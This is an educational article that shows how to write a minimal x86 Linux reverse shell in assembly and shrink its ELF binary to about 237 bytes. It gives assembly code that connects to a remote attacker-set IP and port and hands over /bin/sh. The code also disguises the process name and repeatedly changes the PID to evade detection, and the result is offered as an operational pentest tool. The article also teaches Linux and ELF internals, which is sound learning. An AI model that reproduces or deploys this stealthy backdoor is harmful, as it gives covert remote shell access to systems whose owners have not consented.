What for?
Plenty of small reverse shells are available on the Internet: [tiny shell](https://github.com/creaktive/tsh/blob/master/tsh.c), prism, and others. Reverse shells written in C are only tens to hundreds of kilobytes in size. So, what’s the point of creating another one?
The point is simple. This is an educational article: similar to the development of kernel rootkits, which is one of the most intuitive ways to understand the structure of the Linux kernel, writing a reverse shell with additional functionality and restrictions on the executable file size enables you to explore some unexpected Linux features, including those related to ELF files, their loading and execution, resource inheritance in child processes, and linker operations. Along the way, plenty of exciting discoveries and curious hacks await you. And in the end, you will get a bonus: an operational tool that you can additionally refine, polish, and use in pentesting. Let’s start!
info
The resultant program is available on GitHub.
warning
All information provided in this article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication.
Terms of reference
In addition to the connection to a given port on a given host, your reverse shell must support the following functions:
- set its name at startup (to be less detectable);
- change the process identifier on a regular basis (to be more elusive); and
- be as small as possible (to make your task more interesting).
First, you have to select the language. Since one of your main goals is to reduce the binary size, two options come to mind: C and assembly. Indeed, C makes it possible to create tiny (by modern standards) Hello Worlds (some 17 and ~800 KB for dynamic and static linking, respectively, vs. 2 MB in Go); however, as you probably know, when you compile C code, additional code is generated. This code is responsible for:
- execution of global constructors and destructors, if any;
- correct passing of arguments to main(); and
- transferring control from __libc_start_main() to main().
Constructors and destructors
Arrays of constructor functions and destructor functions are called before and after main(), respectively. Their code is stored in separate sections, unlike the ‘normal’ code, which has a section of its own. Such functions are used inter alia for various initializations in shared libraries or to set buffering parameters in apps interacting over the network (e.g. in CTF tasks). To ensure that a function falls into one of these sections, you must specify the corresponding __attribute__ prior to defining the function.
In some cases, the sections storing these functions go by other names; there are three naming variants for constructors and three for destructors. Generally speaking, all of them perform the same function, and their differences are irrelevant for the purposes of this article. More information on global constructors and destructors can be found on wiki.osdev.org.
Also, the output executable file may contain sections with debugging and other information (e.g. symbol names, compiler version, etc.); this information isn’t directly required for its execution and operation, but it increases the file size, sometimes significantly. Such sections will be discussed in more detail a little later.
This ‘harness’ is inextricably linked with C binaries (at least in Linux). But for your purposes, this is just ballast to be mercilessly disposed of. Therefore, your reverse shell should be written in the great and terrible assembly language (of course, for x86). The plan is as follows: first, you write operational code and then you start reducing its size.
Coding
I suggest using NASM. You can take the simplest asm reverse shell as a basis. In my humble opinion, 32-bit code is preferable: instructions in this mode are shorter, and you don’t lose the required functionality since your primary objective is to connect to the server and run the shell; the shell itself will then operate in 64-bit mode.
The code must perform the following operations:
- at startup, the reverse shell changes its first execution argument (these arguments are displayed in ps and htop);
- it also changes the short name (it’s displayed by the top utility);
- then it tries to connect to the server. If the attempt fails, a child process is created, the parent one terminates, the child waits out the timeout, and the connection attempt is repeated; and
- on successful connection, the shell runs /bin/sh whose stdin, stdout, and stderr are linked with the socket communicating with the server. The process name is spoofed as well.
So, what then is my name to you?
In Linux, there are two ‘entities’ that store the name associated with a process. Let’s call them ‘full’ and ‘short’ names. Both can be accessed via /: the full one is in /; while the short one, in / (comm for command).
According to its description, the short name contains the name of the executable file without the path to it. This name is stored in the kernel structure task_struct describing the process (in kernel terms, a task), and its length is limited to 16 characters, including the null byte.
The full name contains the program arguments (i.e. *argv[]): the name of the executable file as it was specified at startup is stored in the zeroth element, while the passed arguments (if any) are stored in the rest of the elements.
It’s pretty easy to change the short name. You can use the prctl() system call for this purpose. With prctl(), a process or thread can perform various operations with its name, privileges (capabilities), memory areas, seccomp mode, etc. The number of the required operation is passed as the first argument, followed by the rest of the parameters, whose number can vary. You are interested in the PR_SET_NAME operation, where the pointer to the new name is passed as the second argument. However, if the name, including the null byte, is longer than 16 characters, it will be truncated.
In other words, to change the short name, you have to call prctl() with PR_SET_NAME, where NEW_ARGV contains the new name’s address. Execute the following code:
        mov eax, 0xac           ; NR_PRCTL
        mov ebx, 15             ; PR_SET_NAME
        mov ecx, NEW_ARGV
        int 0x80                ; syscall interrupt
        ...
    NEW_ARGV:
        db "s0l3g1t", 0
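The 16-character limit described above can be illustrated without touching a real process. The following is a minimal sketch that only models the truncation rule; the helper name kernel_comm and the constant name are chosen for this illustration and do not call the kernel.

```python
# Models the short-name rule only: the comm buffer holds 16 bytes,
# one of which is the terminating null byte.
TASK_COMM_LEN = 16


def kernel_comm(requested: bytes) -> bytes:
    """Return the short name that would be kept for `requested` (illustrative model)."""
    name = requested.split(b"\0", 1)[0]   # the name ends at the first null byte
    return name[:TASK_COMM_LEN - 1]       # at most 15 visible bytes survive


if __name__ == "__main__":
    print(kernel_comm(b"s0l3g1t\0"))
    print(kernel_comm(b"a-very-long-process-name"))
```

A name of 15 bytes or fewer is kept whole; anything longer loses its tail.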
info
Plenty of useful information about system calls can be found in man. It also contains two tables for platforms and ABIs supported by Linux; they list the instructions used to make system calls and the registers used to pass arguments and return values. Note that the calling conventions are different from those used in usermode apps (at least on x86).
Now you can rewrite argv[0]. The following piece of code performs operations similar to strncpy() in C (the address of argv[0] was already pushed onto the stack):
        mov edi, [esp]                  ; edi = &argv[0]
        mov esi, NEW_ARGV
        mov ecx, _start - NEW_ARGV      ; ecx = strlen(NEW_ARGV) + NULL-byte
    _name_loop:
        movsb                           ; edi[i] = esi[i] ; i+=1
        loop _name_loop
        ...
    NEW_ARGV:
        db "s0l3g1t", 0
    _start:
        ...
This address is placed in edi (destination index register). The address of the name you set ("s0l3g1t") is placed in esi (source index register), while its length, including the null byte, goes in ecx. However, it turns out that if the original argv[0] ("./) was longer than the new one, then, despite the presence of the terminating null byte, the ps output will be as follows.
That’s not good. Let’s try to fill it with zeros first and then overwrite.
That’s better: the ps output contains nothing suspicious! But there is still some room for improvement. What does the manual say? According to man (subsection /):
Furthermore, a process may change the memory location that this file refers via prctl(2) operations such as PR_SET_MM_ARG_START.
In addition to the PR_SET_MM_ARG_START parameter, man contains PR_SET_MM_ARG_END (these options are available starting from Linux 3.5). It seems that the second parameter is exactly what you need! Too bad: to perform prctl() operations affecting the process memory, you need the CAP_SYS_RESOURCE privilege (otherwise it would be too easy!). And to grant it, superuser rights are required…
For the same reason, if you ‘explicitly’ replace the address of the argv[] string array on the stack, this won’t change the contents of /: Linux stores the addresses of the beginning and end of the memory region holding the process arguments, and the content of this particular memory region is displayed. The same is true for environment variables as well. Therefore, xxd displays zeros.
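Why a hex dump still shows zeros can be modelled in a few lines: the argument region keeps its original size, so a shorter name leaves a tail of null bytes behind. This is a sketch under stated assumptions; overwrite_arg_region and the sample region are hypothetical and operate on a plain byte string, not on a live process.

```python
def overwrite_arg_region(region: bytes, new_name: bytes) -> bytes:
    """Zero-fill a fixed-size argument region, then copy new_name to its start."""
    if len(new_name) + 1 > len(region):
        raise ValueError("new name (plus null byte) does not fit into the region")
    # The region boundaries do not move, so the unused tail stays as null bytes.
    return new_name + b"\0" * (len(region) - len(new_name))


if __name__ == "__main__":
    original = b"./hypothetical-name\0"          # made-up original argv[0]
    spoofed = overwrite_arg_region(original, b"s0l3g1t")
    print(len(original), len(spoofed))
    print(spoofed.hex(" "))                      # the run of 00 bytes is the trace
```

The length of the region is unchanged, which is exactly what gives the rename away in a byte-level view.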
Let’s assume that your reverse shell is always run on behalf of a regular user, and there is no way to grant the CAP_SYS_RESOURCE privilege to it. Therefore, you simply fill the entire original argv[0] with zeroes and then overwrite it with your own one. How often does one check the process name in / using xxd?
Now all you have to do is find out how to spoof the name /bin/sh (because after calling execve() to run the shell, its *argv[] will show /bin/sh to the admin in the ps and htop outputs and in /). Fortunately, this problem is easy to solve: you just pass your own argv[] to this syscall as the second argument. Keep in mind that the passed pointer points to an array of arguments (strings) that must be terminated with a null pointer. Therefore, before pushing the NEW_ARGV address onto the stack, 0 must be pushed there:
        xor eax, eax
        push dword 0x0068732f   ; push "/sh"
        push dword 0x6e69622f   ; push /bin (="/bin/sh")
        mov ebx, esp            ; ebx = ptr to "/bin/sh"
        push edx                ; edx = 0x00000000
        mov edx, esp            ; **envp = edx = ptr to NULL address
        push ebx                ; pointer to /bin/sh
        push 0
        push NEW_ARGV
        mov ecx, esp            ; ecx points to shell's argv[0] ( &NEW_ARGV )
        mov al, 0xb
        int 0x80                ; execve("/bin/sh", &{ NEW_ARGV, 0 }, 0)
But now you cannot change the short name with prctl(), since you are working from a shell where syscalls cannot be made directly. However, there are other interesting ways to do this.
Starting over
To connect to a server, you have to create a socket, fill the struct sockaddr structure containing the address to connect to, and connect to it.
A socket is a connection endpoint in Linux; as unix and netlink sockets show, this is not necessarily a network connection. When you create a socket, you must specify the address family or the protocol family (currently, the first one contains aliases of the second one) it will belong to, the socket type (streaming, datagram, raw, etc.), and the protocol (it depends on the family, see man). In this particular case, you need a stream (TCP, SOCK_STREAM) internet socket (the AF_INET family), and the protocol will be selected automatically when you pass 0:
        mov al, 0x66        ; 0x66 = 102 = socketcall()
        push ebx            ; 3rd arg: socket protocol = 0
        mov bl, 0x1         ; ebx = 1 = socket() function
        push byte 0x1       ; 2nd arg: socket type = 1 (SOCK_STREAM)
        push byte 0x2       ; 1st arg: socket domain = 2 (AF_INET)
        mov ecx, esp        ; copy stack structure's address to ecx (pointer)
        int 0x80            ; eax = socket(AF_INET, SOCK_STREAM, 0)
info
On some platforms, including x86_32, a single system call socketcall() is used for socket functions instead of separate syscalls socket(), bind(), connect(), etc.; its first argument is the number of the required function. These numbers are defined in the Linux kernel.
The struct sockaddr parameter is a kind of ‘base class’ for definitions of various protocols’ addresses. It has only two fields:
    /* Structure describing a generic socket address. */
    struct sockaddr {
        unsigned short sa_family;   /* Common data: address family and length. */
        char sa_data[14];           /* Address data. */
    };
The value of the first field must match the family of the previously created socket. The second field describes the address the socket will be associated with. As you know, different protocols have different address formats, including sockaddr_in/sockaddr_in6 (internet sockets), sockaddr_un (unix sockets), etc. But all of them are a kind of wrapper for the sockaddr structure and can be easily cast to the sockaddr type to support a single API for socket functions. For instance, sockaddr_in divides the sa_data field into a port number and an IP address, thus leaving eight unused bytes (see also man):
    struct sockaddr_in {
        sa_family_t sin_family;     /* address family: AF_INET */
        in_port_t sin_port;         /* port in network byte order */
        struct in_addr sin_addr;    /* internet address */
        unsigned char sin_zero[8];  /* Pad to size of 'struct sockaddr' */
    };

    /* Internet address */
    struct in_addr {
        uint32_t s_addr;            /* address in network byte order */
    };
Your objective is to correctly form this structure on the stack and pass its address to the connect() system call. As said above, the port (REV_PORT) and the IP address (REV_IP) in this structure must be in network byte order (i.e. big-endian, most significant byte first). The code below calls connect(), where socketfd was obtained earlier:
        mov al, 0x66            ; 0x66 = 102 = socketcall()
        push dword REV_IP       ; Remote IP address
        push word REV_PORT      ; Remote port
        push word 0x0002        ; sin_family = 2 (AF_INET)
        mov ecx, esp            ; ecx = ptr to *addr structure
        push byte 16            ; addr_len = 16 (structure size)
        push ecx                ; push ptr of args structure
        push ebx                ; ebx = socketfd
        mov bl, 0x3             ; ebx = 3 = connect()
        mov ecx, esp            ; save esp into ecx, points to socketfd
        int 0x80                ; eax = connect(socketfd, *addr[2, PORT, IP], 16) = 0 on success
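To see the 16-byte layout that the pushes above are expected to produce in memory, the same structure can be packed in Python. This is only an illustrative sketch: pack_sockaddr_in is a name made up here, and the address 192.0.2.1 (a documentation-only range) and port 4444 are placeholder values, not the ones used by the article.

```python
import socket
import struct


def pack_sockaddr_in(ip: str, port: int) -> bytes:
    """Build the in-memory image of struct sockaddr_in for a little-endian x86 host."""
    family = struct.pack("<H", socket.AF_INET)   # sin_family: host byte order
    port_be = struct.pack("!H", port)            # sin_port: network byte order
    addr_be = socket.inet_aton(ip)               # sin_addr: 4 bytes, network byte order
    return family + port_be + addr_be + b"\0" * 8  # sin_zero padding up to 16 bytes


if __name__ == "__main__":
    print(pack_sockaddr_in("192.0.2.1", 4444).hex(" "))
```

Only the family field is stored in host order; the port and the address are the two fields that must be byte-swapped on x86.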
If the connection attempt fails, the reverse shell should try again after a while. This is simple: you check the return code received in eax; in case of a successful connection, it’s 0; in case of an error, it’s a negative errno value. Prior to a new connection attempt, the reverse shell must create a child process and terminate the parent process so that its PID changes. Important: it’s the child process that will sleep. For simplicity, you can set the timeout to five seconds (although a random value varying in a certain range would be better).
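On Linux, a raw system call made with int 0x80 reports failure by returning a negative errno value in eax rather than the -1 returned by the C library wrappers. The sketch below shows how such a raw 32-bit value can be interpreted; decode_syscall_ret is a helper invented for this illustration.

```python
import errno


def decode_syscall_ret(eax: int):
    """Interpret a raw unsigned 32-bit eax value left by a Linux system call."""
    value = eax - (1 << 32) if eax & 0x80000000 else eax   # reinterpret as signed
    if -4095 <= value < 0:                                  # range reserved for errors
        return ("error", errno.errorcode.get(-value, str(-value)))
    return ("ok", value)


if __name__ == "__main__":
    print(decode_syscall_ret(0))
    print(decode_syscall_ret((-errno.ECONNREFUSED) & 0xFFFFFFFF))
```

In assembly, the same check usually boils down to testing the sign of eax after the interrupt.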
Setting up the sleep function requires some time and effort. You cannot just call sleep() because the syscall you need takes two pointers to structures: the first one describes the sleep duration, while the second one records the remaining time if the sleep was interrupted (e.g. by an incoming signal):
int nanosleep(const struct timespec *req, struct timespec *rem)
However, the manual says that rem can be NULL, which is good. All you have to do is write to the req structure the seconds and nanoseconds during which the function should sleep:
    struct timespec {
        time_t tv_sec;   /* goes to 'long int' */
        long tv_nsec;
    };
Both numbers belong to the long type that occupies 4 bytes on x86_32. So, you have to fill the structure and make the syscall as shown below (and clean up the stack afterwards):
        mov eax, NR_NANOSLEEP
        push dword 0        ; nsec
        push dword 2        ; sec
        mov ebx, esp        ; ebx = struct timespec *req
        xor ecx, ecx        ; ecx = struct timespec *rem = NULL
        int 0x80
        add esp, 8          ; cleanup
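The two pushes above leave an 8-byte struct timespec on the stack, seconds first. A small sketch of the same layout, assuming the 32-bit ABI with 4-byte long fields; pack_timespec32 is a hypothetical helper name.

```python
import struct


def pack_timespec32(seconds: float) -> bytes:
    """Pack a duration as a 32-bit struct timespec: tv_sec, then tv_nsec."""
    if seconds < 0:
        raise ValueError("duration must be non-negative")
    sec = int(seconds)
    nsec = int(round((seconds - sec) * 1_000_000_000))
    if nsec == 1_000_000_000:        # rounding spilled into the next second
        sec, nsec = sec + 1, 0
    return struct.pack("<ll", sec, nsec)   # two little-endian 4-byte signed longs


if __name__ == "__main__":
    print(pack_timespec32(2).hex(" "))
```

Because the stack grows downwards, the field pushed last (seconds) ends up at the lower address, i.e. first in the structure.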
The output should be as follows.
Diet for an elf
Congrats! You’ve got an operational reverse shell! What’s its size? If you build the binary using nasm, it will be some 5 KB.
info
This article is largely inspired by a study with a self-explanatory second name: Size Is Everything (also available on GitHub). The idea is to get rid of everything unnecessary in an ELF file, examine the ELF file format and Linux internals, and finally get an operational binary. This file does nothing, only returns the code “42”. Spoiler: the author managed to squeeze it to 45 bytes from the initial 4 KB!
So, your shell is currently 4912 bytes in size. Time to examine its ‘elven’ nature.
Building a tiny elf
Any pentester familiar with C is aware that programs written in this language start with main(), since gcc expects this function to be in the code. In fact, it’s not quite so: the execution of an executable file starts from the entry point, and this is usually the _start() function responsible for the preliminary preparation and transfer of control to main().
You assemble the . file using NASM, and it produces a ‘Relocatable’ ELF file (normally, such files have the . extension). Relocatable ELF files are produced when a project is assembled from several source files according to the scheme “one source – one relocatable elf” (by the way, the sources can be written in more than one language).
Relocatable ELF files contain sections with data and code that can be linked against other files to create an executable binary. This is exactly what the linker does; in this particular case, the linker is ld. It expects a function named _start to be present in one of the input files to make it the entry point.
A hollow inside
After executing the above commands, you get a file where the code (section .) starts at a physical offset (offset in the file on disk) of 0x1000. This suspiciously resembles the page size, and before it, there is only a space filled with zeros. By the way, this padding occupies as much as 4 KB, which is totally unacceptable!
Let’s see what linker options are responsible for this. Based on the description of the -n key (Do ), this is exactly what you need.
912 bytes! Much better. The code now starts at a physical offset of 0x60. What’s next? The time has come to play with the sections.
info
You can review the history of commits to examine the source code at different development stages.
Who needs those SHTs?
SHT is a Section Header Table (although more often you can find just a “section table” or “section headers”). It describes every section in the file, including its name, and you can view these entries by running readelf.
Where do the other sections come from, given that the source code had only the . section? Remember how the executable file was assembled. For instance, to enable ld to find the _start() function, information about it must be present somewhere. It’s stored in the symbol table, in the . file, in the . and . sections.
As you can see, all your labels specified in the source code are present there. But an executable file doesn’t necessarily have to contain a symbol table. Therefore, you can apply the strip command to it or use the linker key -s to get rid of the symbols in it. However, if you ‘strip’ symbols in a relocatable file, the linker won’t be able to find the entry point and assemble an executable elf, which is logical. Overall, this trick reduces the size by a little more than half (to be specific, by 468 bytes).
Moreover, the correct operation of a binary doesn’t require the information about its sections at all! The most straightforward way to remove them from the executable file is to use the dd command. Fortunately, the section table is located at the end of the file, so this operation isn’t difficult. In this particular case, it starts at offset 0x130 (304).
But to get rid of the information indicating that there were sections in the file, you should not only cut off the SHT at the end of it, but also fill the fields in the ELF file header containing the offset of the section table, the size of its records, and their number (e_shoff, e_shentsize, and e_shnum in ElfN_Ehdr, respectively) with zeroes. In the above screenshot, these fields are underlined. For detailed instructions on how to get rid of section headers, see the article ELF – No Section Header? No Problem; also see the Oracle blog for more information about the sections.
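The two steps just described (cutting off the table and zeroing the header fields that point to it) can be sketched on a byte string as follows. This is an illustration rather than the article's dd-based procedure: the function names are invented here, only little-endian 32-bit ELF images are handled, and e_shstrndx is zeroed as well on the assumption that it is meaningless once the table is gone.

```python
import struct

# Elf32_Ehdr, little-endian: e_ident, e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum,
# e_shentsize, e_shnum, e_shstrndx (52 bytes in total).
EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")


def section_table_info(data: bytes) -> dict:
    """Return the header fields that describe the section header table."""
    f = EHDR32.unpack_from(data, 0)
    return {"e_shoff": f[6], "e_shentsize": f[11], "e_shnum": f[12], "e_shstrndx": f[13]}


def strip_section_table(data: bytes) -> bytes:
    """Drop a trailing section header table and zero the fields referring to it."""
    f = list(EHDR32.unpack_from(data, 0))
    if f[0][:4] != b"\x7fELF" or f[0][4] != 1:
        raise ValueError("not a 32-bit ELF image")
    shoff = f[6]
    if shoff == 0:
        return data                              # nothing to strip
    if shoff + f[11] * f[12] != len(data):
        raise ValueError("section table is not at the very end of the file")
    f[6] = 0                                     # e_shoff
    f[11] = f[12] = f[13] = 0                    # e_shentsize, e_shnum, e_shstrndx
    return EHDR32.pack(*f) + data[EHDR32.size:shoff]
```

The check on the table position mirrors the observation above that the operation is easy only because the table sits at the end of the file.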
info
The structure of an ELF header is shown in this diagram. I strongly recommend reviewing it if you have read this far. Just keep in mind that it depicts a 32-bit ELF, and the sizes of individual fields in it are smaller than in a 64-bit one.
Now your reverse shell is 304 bytes in size. Is it possible to reduce it further?
‘Compressing’ instructions
This trick is well known to pentesters who have to write shellcode for buffers with a limited size. The point is that different instructions on x86 have different lengths, and the same thing can often be expressed in the assembly language in different ways. Below is one of my favorite examples.
Review your code from this perspective. Of course, its readability will most likely deteriorate, but this won’t affect the shell’s workability in any way! First of all, don’t write small numbers directly into registers. In this particular case, these are mostly system call numbers.
Replacing mov with a push/pop pair will really help with syscalls having small numbers; however, for numbers greater than 0x7f, push will take 5 bytes instead of two, and one more byte is used by pop. As you can see, offsets in the reverse shell are much greater than this value; therefore, if you try to save on them this way, you would lose more than you gain. In some cases, instead of placing 1 into the register directly, you can simply increment it (important: don’t forget to zero it first). Just compare!
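The byte counts mentioned above can be checked by writing out the 32-bit x86 encodings by hand. The sketch below builds the machine code for three ways of loading a value into eax; the helper names are made up for this illustration, and only the eax forms of the instructions are covered.

```python
import struct


def mov_eax_imm32(n: int) -> bytes:
    """mov eax, imm32: opcode B8 followed by a 4-byte immediate (always 5 bytes)."""
    return b"\xb8" + struct.pack("<I", n & 0xFFFFFFFF)


def push_pop_eax(n: int) -> bytes:
    """push n / pop eax: 3 bytes if n fits a signed byte, 6 bytes otherwise."""
    if -0x80 <= n <= 0x7F:
        push = b"\x6a" + struct.pack("<b", n)                 # push imm8 (sign-extended)
    else:
        push = b"\x68" + struct.pack("<I", n & 0xFFFFFFFF)    # push imm32
    return push + b"\x58"                                     # pop eax


def zero_inc_eax() -> bytes:
    """xor eax, eax / inc eax: loads 1 into eax in 3 bytes."""
    return b"\x31\xc0\x40"


if __name__ == "__main__":
    for n in (0x0B, 0x66, 0xAC):
        print(hex(n), len(mov_eax_imm32(n)), len(push_pop_eax(n)))
```

For 0xac the push/pop pair is longer than a plain mov, which is the break-even point the paragraph above warns about.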
Also, you don’t need some of the register initialization instructions because the registers are all set to zero at startup. The specific values of nanoseconds spent on sleep and the exit code for unsuccessful connection attempts can be neglected and removed, too. The way you push the sockaddr_in structure onto the stack can also be reduced in size: instead of using two separate instructions for the address family and port number (that in total occupy 4 bytes in the structure), you can push them onto the stack with a single instruction.
As a result, the code shrinks by an additional 25 bytes; now its size is 279 bytes. Reducing it further requires creativity and patience.
Bonus: sploiting headers
An ELF header includes a space filled by default with zeros, and the system doesn’t check these values when the file is loaded and executed (although certain tools do this). This space is located in the very first field, e_ident, and starts at the tenth byte (EI_PAD). The ninth byte, EI_ABIVERSION, which describes the ABI version for object files, is irrelevant for you since your shellcode isn’t written for the ARM architecture. Therefore, you can safely use 8 bytes starting from the ninth one (offset 8 in the file). This is just enough for "/bin/sh" together with its null byte. But how do you correctly specify the offset to it in the code without calculating or changing it manually?
The answer is: you have to change the build parameters. Since you are going to write the ELF header yourself instead of taking the one generated by the linker, you cannot use the linker. For such situations, NASM lets you specify the ‘raw’ format of the output file on the nasm command line. Then it builds the file as defined in the source code, without adding any headers to it. You have to specify the address where this stuff should be loaded so that NASM can correctly calculate the entry point and other offsets. For this purpose, the org directive is used.
There is one more thing that you can change without hampering the binary’s workability: the previously zeroed information about the section table. The ELF header contains the following fields in a row:
- e_shoff, e_flags (8 bytes)
- e_shentsize, e_shnum, e_shstrndx (6 bytes)
The e_flags field does not describe the SHT; according to the documentation, it’s intended for processor-specific flags. But since none of them are currently defined, you can safely use 8 bytes from the first chain of fields. NEW_ARGV will fit there perfectly.
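Where these two chains sit inside the 52-byte Elf32_Ehdr can be worked out by summing the field sizes. A small sketch of that arithmetic follows; the field list reflects the standard 32-bit layout, while the function name is invented for this example.

```python
import struct

# (field name, struct format) pairs in the order they appear in Elf32_Ehdr.
ELF32_EHDR_FIELDS = [
    ("e_ident", "16s"), ("e_type", "H"), ("e_machine", "H"), ("e_version", "I"),
    ("e_entry", "I"), ("e_phoff", "I"), ("e_shoff", "I"), ("e_flags", "I"),
    ("e_ehsize", "H"), ("e_phentsize", "H"), ("e_phnum", "H"),
    ("e_shentsize", "H"), ("e_shnum", "H"), ("e_shstrndx", "H"),
]


def field_offsets():
    """Return ({field: offset}, total header size) for a 32-bit ELF header."""
    offsets, pos = {}, 0
    for name, fmt in ELF32_EHDR_FIELDS:
        offsets[name] = pos
        pos += struct.calcsize("<" + fmt)
    return offsets, pos


if __name__ == "__main__":
    offsets, size = field_offsets()
    for name in ("e_shoff", "e_flags", "e_ehsize", "e_shentsize"):
        print(name, offsets[name])
    print("header size", size)
```

The first chain spans offsets 32 to 39 and the second one spans the last 6 bytes of the header, which matches the sizes given in the list above.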
The second chain can be used to store the code that terminates the process in case of an unsuccessful connection (it occupies 5 bytes), while a jmp to it can be put in its original place, thus saving 3 more bytes. Your manually assembled header now looks as follows:
        org 0x08048000
    ehdr:                               ; Elf32_Ehdr
        db 0x7F, "ELF"                  ; e_ident
        db 1, 1, 1, 0
    BIN_SH:
        db "/bin/sh", 0
    e_type:
        dw 2                            ; e_type
        dw 3                            ; e_machine
        dd 1                            ; e_version
        dd _start                       ; e_entry
        dd phdr - $$                    ; e_phoff
    NEW_ARGV:
        db "s0l3git", 0                 ; e_shoff, e_flags
        dw ehdrsize                     ; e_ehsize
        dw phdrsize                     ; e_phentsize
        dw 1                            ; e_phnum
    _exit:
        push NR_EXIT                    ; e_shentsize
        pop eax                         ; e_shnum
                                        ; exit_code = random :D
                                        ; e_shstrndx
        int 0x80
        db 0
    ehdrsize equ $ - ehdr
    phdr:                               ; Elf32_Phdr
        dd 1                            ; p_type
        dd 0                            ; p_offset
        dd $$                           ; p_vaddr
        dd $$                           ; p_paddr
        dd filesize                     ; p_filesz
        dd filesize                     ; p_memsz
        dd 5                            ; p_flags
        dd 0x1000                       ; p_align
    phdrsize equ $ - phdr
        ...
After all these manipulations, the binary is 254 bytes in size. What else can be done? For instance, you can try to make the ELF header and the Program Header Table overlap (as suggested in the above-mentioned article “Size Is Everything”). This is possible because the last 8 bytes of the ELF header are identical to the first 8 bytes of the PHT, while the overlapped ELF bytes with new values are not critical for the file execution. But in this case, you will have to return the _exit code put previously in the header to its original place. After playing a bit with registers, you get a reverse shell 237 bytes in size. This is roughly one twentieth of its original size!
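The claim about identical bytes is easy to verify by packing both ends. The sketch below assumes a header with a single program header entry and zeroed section fields, plus a loadable segment that starts at file offset 0; the function names are hypothetical.

```python
import struct


def ehdr_tail(e_phnum=1, e_shentsize=0, e_shnum=0, e_shstrndx=0) -> bytes:
    """Last 8 bytes of Elf32_Ehdr: four 2-byte fields starting at e_phnum."""
    return struct.pack("<HHHH", e_phnum, e_shentsize, e_shnum, e_shstrndx)


def phdr_head(p_type=1, p_offset=0) -> bytes:
    """First 8 bytes of Elf32_Phdr: p_type (1 = PT_LOAD) and p_offset."""
    return struct.pack("<II", p_type, p_offset)


if __name__ == "__main__":
    print(ehdr_tail().hex(" "))
    print(phdr_head().hex(" "))
```

The match holds only while the section fields are zero, which is why code stored in those fields has to move back out before the two structures can share bytes.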
Lessons learnt
First, a reverse shell can be ridiculously tiny if necessary. Second, 32-bit processes can execute execve() and become 64-bit ones. Headers in ELF files can overlap; if it’s done properly, the file will work just fine. And if a process changes its name, it may leave traces.
Your reverse shell is fully operational, and you can add more functionality to it. For instance, teach the shell to ignore signals, scan ports, encrypt traffic… But that’s another story. Good luck in your endeavors!